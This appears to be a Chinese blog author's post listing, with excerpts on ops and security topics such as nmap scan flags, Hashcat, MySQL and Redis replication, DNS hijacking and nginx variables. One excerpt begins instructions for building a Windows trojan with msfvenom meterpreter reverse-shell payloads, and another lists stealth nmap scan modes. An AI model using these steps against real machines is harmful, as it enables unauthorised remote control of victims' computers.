学习
天码行空的码
这个作者很懒,什么都没留下…
展开
-
nmap 常用参数
-sT TCP connect()扫描,这种方式会在目标主机的日志中记录大批连接请求和错误信息。-sS 半开扫描,很少有系统能把它记入系统日志。不过,需要Root权限。-sF -sN 秘密FIN数据包扫描、Xmas Tree、Null扫描模式-sP ping扫描,Nmap在扫描端口时,默认都会使用ping扫描,只有主机存活,Nmap才会继续扫描。-sU UDP扫描,但UDP扫描是不可靠的-sA 这项高级.原创 2020-09-03 10:54:08 · 344 阅读 · 0 评论 -
常用安全工具
Hashcat是自称世界上最快的密码恢复工具原创 2020-08-19 15:14:55 · 95 阅读 · 0 评论 -
MySQL 5.7 GroupReplication 高可用架构
MySQL 5.7 GroupReplication 高可用架构1、背景主从复制,一主多从,主库提供读写功能,从库提供只读功能。当一个事务在master 提交成功时,会把binlog文件同步到从库服务器上落地为relay log给slave端执行,这个过程主库是不考虑从库是否有接收到binlog文件,有可能出现这种情况,当主库commit一个事务后,数据库发生宕机,刚好它的binlog还没来得及传送到slave端,这个时候选任何一个slave端都会丢失这个事务,造成数据不一致情况。 为了避免出现主.转载 2020-08-17 00:31:23 · 413 阅读 · 0 评论 -
TCP拥塞控制简述
为什么要有拥塞控制?不是有流量控制了吗?前面的流量控制是避免【发送方】的数据填满【接收方】的缓存,但是并不知道网路中发生了什么。一般来说,计算机网络都处于一个共享的环境。因此也有可能会因为其他主机之间的通信使得网络拥堵。在网络出现拥堵时,如果继续发送大量数据包,可能会导致数据包延时、丢失等,这时TCP就会重传数据,但是一重传就会导致网络的负担更重,于是会导致更大的延时以及更多的丢包,这个情况就会进入恶性循环被不断地放大...所以,TCP不能忽略网络上发生的事,它被设计成一个无私的协议,.原创 2020-08-10 20:33:48 · 587 阅读 · 0 评论 -
ffmpeg 安装与常用命令
使用ffmpeg 下载合成m3u8视频文件,搜到这篇文章常用命令写的比较详细。mac os 使用brew reinstall ffmpeg 安装ffmpeg 在终端直接可以使用。ffmpeg常用命令如果想多了解一些FFmpeg的编码原理可以看下面链接:FFmpeg编解码原理...原创 2020-03-18 13:41:34 · 125 阅读 · 0 评论 -
dns over https(doh)解决DNS劫持方案
这些年DNS劫持一直是比较头疼的问题(ISP 滥用用于注入广告,同时也导致了隐私泄漏等)虽然https可以解决网页加密的问题,但在DNS解析环节还是通过UDP 53端口明文传输,移动端(APP)可以使用httpdns,但对于web端来说依然的使用传统DNS,为了解决这个问题各大浏览器及DNS厂商也开始支持DOH(DNS-OVER-HTTPS)对DNS解析进行加密解决localdns 劫持问...原创 2020-03-13 13:14:25 · 9225 阅读 · 0 评论 -
mysql 索引数据结构(笔记)
mysql 支持多种存储引擎,各种存储引擎支持也各不相同,因此mysql数据库支持多种索引类型如(BTrees索引、哈希索引、全文索引等等)索引的用途:帮助mysql高效获取数据的数据结构。索引使用策略及优化: mysql优化主要分为结构优化和查询优化。 一般在数据库系统或文件系统中使用的B+Tree结构都在经典B+Tree的基础上进行了优化,增加了顺序访问指针。B...原创 2020-03-12 12:32:09 · 4508 阅读 · 0 评论 -
kafka 笔记
kafka名词解释broker: 消息中间件处理节点,一个kafka节点就是一个broker,一个或者多个broker组成一个kafka集群。topic: 主题,kafka根据topic对消息进行归类,发布到kafka集群的每条消息都需要指定一个topic。producer: 消息产生者,向broker发送消息的客户端。consumer:消息消费者、从broker读取消息的客户端。con...原创 2020-03-12 11:49:28 · 4444 阅读 · 0 评论 -
DNS 劫持常见解决方案
常见解决方案:1、使用https 协议。2、app 使用 httpdns, 绕过了运营商DNS,直接通过https://httpdnsip/dn?=xxx.xxx.xxx3、内容安全策略 (CSP)是一个额外的安全层,用于检测并削弱某些特定类型的攻击,包括跨站脚本 (XSS)和数据注入攻击等。无论是数据盗取、网站内容污染还是散发恶意软件,这些攻击都是主要的手段。4、SRI是s...原创 2020-03-07 20:13:08 · 6349 阅读 · 0 评论 -
HTTP 长连接
先理解下长连接和短链接短连接: 短连接就是每次请求一个资源就建立连接,请求完成后连接立马关闭。每次请求都经过“创建tcp连接->请求资源->响应资源->释放连接”这样的过程长连接: 长连接(persistent connection),就是只建立一次连接,多次资源请求都复用该连接,完成后关闭。要请求一个页面上的十张图,只需要建立一次tcp连接,然后依次请求十张图,...原创 2020-03-05 15:25:05 · 6118 阅读 · 0 评论 -
DPDK 网络IO 优化
一、Linux + x86网络IO瓶颈1.传统的收发报文方式都必须采用硬中断来做通讯,每次硬中断大约消耗100微秒,这还不算因为终止上下文所带来的Cache Miss。2.数据必须从内核态用户态之间切换拷贝带来大量CPU消耗,全局锁竞争。3.收发包都有系统调用的开销。4.内核工作在多核上,为可全局一致,即使采用Lock Free,也避免不了锁总线、内存屏障带来的性能损耗。5.从...原创 2020-02-28 21:29:11 · 7565 阅读 · 1 评论 -
go 国内加速配置
在国内go获取包的时候非常慢使用goproxy的代理速度会快很多。1、Mac os linux 配置vim /etc/profile #编辑输入下面两行$env:GO111MODULE="on"$env:GOPROXY="https://goproxy.io"source /etc/profile2、Windows 设置cmd 命令行执行$env:GO1...原创 2020-02-20 19:32:20 · 10427 阅读 · 0 评论 -
最新版Nginx 内置变量
nginx内置变量内置变量存放在 ngx_http_core_module 模块中,变量的命名方式和apache 服务器变量是一致的。总而言之,这些变量代表着客户端请求头的内容,例如$http_user_agent, $http_cookie, 等等。下面是nginx支持的所有内置变量:$arg_name请求中的的参数名,即“?”后面的arg_name=arg_value形式的arg_n...转载 2020-02-18 21:37:14 · 8471 阅读 · 0 评论 -
redis psync1和psync2 同步详解
Redis2.8 psync1解决什么问题 在psync1功能出现前(redis2.8之前的版本),redis复制秒级中断,就会触发从实例进行fullsync。每一次的fullsync,集群的性能和资源使用都可能带来抖动;如果redis所处的网络环境不稳定,那么fullsync的出步频率可能较高。为解决此问题,redis2.8引入psync1, 有效地解决这种复制闪断,带来的影...原创 2020-02-10 12:50:04 · 9173 阅读 · 0 评论 -
Jenkins pipeline 代码CI/CD流程
Jenkins pipeline 代码CI/CD流程原创 2019-12-01 16:54:27 · 7686 阅读 · 0 评论 -
nginx获取用户IP的姿势
如果有 http header 中有 X-Real-IP,则使用它的值作为用户IP 如果 http header 中有 X-Forwarded-For,则使用第一个值作为用户IP 否则,使用 remote address 作为用户IP X-Forwarded-For 属于 RFC 7239,用法:X-Forwarded-For: client, proxy1, proxy2而 X-Rea...原创 2018-08-16 12:57:59 · 7376 阅读 · 0 评论 -
ETCD集群搭建
安装部分省略 ETCD参数说明 —data-dir 指定节点的数据存储目录,这些数据包括节点ID,集群ID,集群初始化配置,Snapshot文件,若未指定—wal-dir,还会存储WAL文件; —wal-dir 指定节点的was文件的存储目录,若指定了该参数,wal文件会和其他数据文件分开存储。 —name 节点名称 —initial-adver...原创 2018-08-16 13:00:00 · 7390 阅读 · 0 评论 -
Nginx 内置日志变量详解
$args #请求中的参数值$query_string #同 $args$arg_NAME #GET请求中NAME的值$is_args #如果请求中有参数,值为"?",否则为空字符串$uri #请求中的当前URI(不带请求参数...原创 2018-11-14 16:00:15 · 623 阅读 · 0 评论 -
Let's Encrypt 免费证书申请
1、部署客户端 下载:wget https://get.acme.sh 默认下载出来的文件名是index.html,可以重命名也可以直接运行。 bash index.html2、DNSPOD 获取token 获取token后在系里设置环境变量。 export DP_Id="8****" export DP_Key="fdea5****X...原创 2019-03-15 15:16:48 · 294 阅读 · 0 评论 -
redis高可用集群方案
一、Sentinel 哨兵:Sentinel是Redis 的高可用性解决方案: 由一个或多个Sentinel 实例 组成的Sentinel 系统可以监视任意多个主服务器,以及这些主服务器属下的所有从服务器,并在被监视的主服务器进入下线状态时,自动将下线主服务器属下的某个从服务器升级为新的主服务器。server1 掉线server2 升级为主服务器。 ...原创 2019-05-24 16:53:09 · 422 阅读 · 0 评论 -
mac os 升级到Python3
系统默认带的是Python2.7,Python2.7很快将不再继续更新,使用的时候系统也总是提示,索性就直接升级到 Python 3.7。升级步骤:1、安装Python 3.7 brew install python@3 安装完后需要在终端下面使用python3.7 才能使用。为了方便使用,我们做软连接,吧原来的python 2.7链接删掉。...原创 2019-05-24 17:07:35 · 1755 阅读 · 0 评论 -
kali 反弹shell 远程操作Windows
一、在kali终端执行下面命令,生成木马。 反向链接有多种协议: payload:/windows/meterpreter/reverse_http payload:/windows/meterpreter/reverse_https msfvenom -p windows/meterpreter/reverse_tcp LHOST=...原创 2019-05-31 17:31:08 · 2730 阅读 · 0 评论 -
Sql 注入教程
SQL 注入网址转载 2019-07-18 14:11:27 · 302 阅读 · 0 评论 -
python requests 模块访问https链接报错
python requests 模块访问https链接报错如下:/usr/lib/python2.6/site-packages/requests-2.9.1-py2.6.egg/requests/packages/urllib3/util/ssl_.py:315: SNIMissingWarning: An HTTPS request has been made, but the SNI...原创 2019-07-25 16:27:26 · 1383 阅读 · 0 评论 -
Redis中的LRU淘汰策略
Redis作为缓存使用时,一些场景下要考虑内存的空间消耗问题。Redis会删除过期键以释放空间,过期键的删除策略有两种:惰性删除:每次从键空间中获取键时,都检查取得的键是否过期,如果过期的话,就删除该键;如果没有过期,就返回该键。 定期删除:每隔一段时间,程序就对数据库进行一次检查,删除里面的过期键。另外,Redis也可以开启LRU功能来自动淘汰一些键值对。LRU算法当需要从缓存...转载 2019-07-23 13:37:19 · 9345 阅读 · 0 评论 -
Grafana展示Web访问日志分析及查询语句
$hostname 和$$myinterval 环境变量设置如下图:通过阿里云日志服务API接口查询语句。1、查询系统全后端请求延迟 $hostname | select avg(request_time) as response_time, avg(upstream_response_time) as upstream_response_ti...原创 2019-09-17 13:33:49 · 13101 阅读 · 1 评论 -
consul 笔记
consul是什么 是一个支持多数据中心分布式高可用发服务发现和配置共享的软件 使用场景: 1、docker、soreos 实例的注册与配置共享 2、vitess集群 3、saas 应用的配置共享 4、与confd服务集成,动态生成nginx、haproxy配置文件 consul优势: 1、使用raft算法保证一致性,比paxos算法...原创 2018-08-16 12:54:04 · 7354 阅读 · 0 评论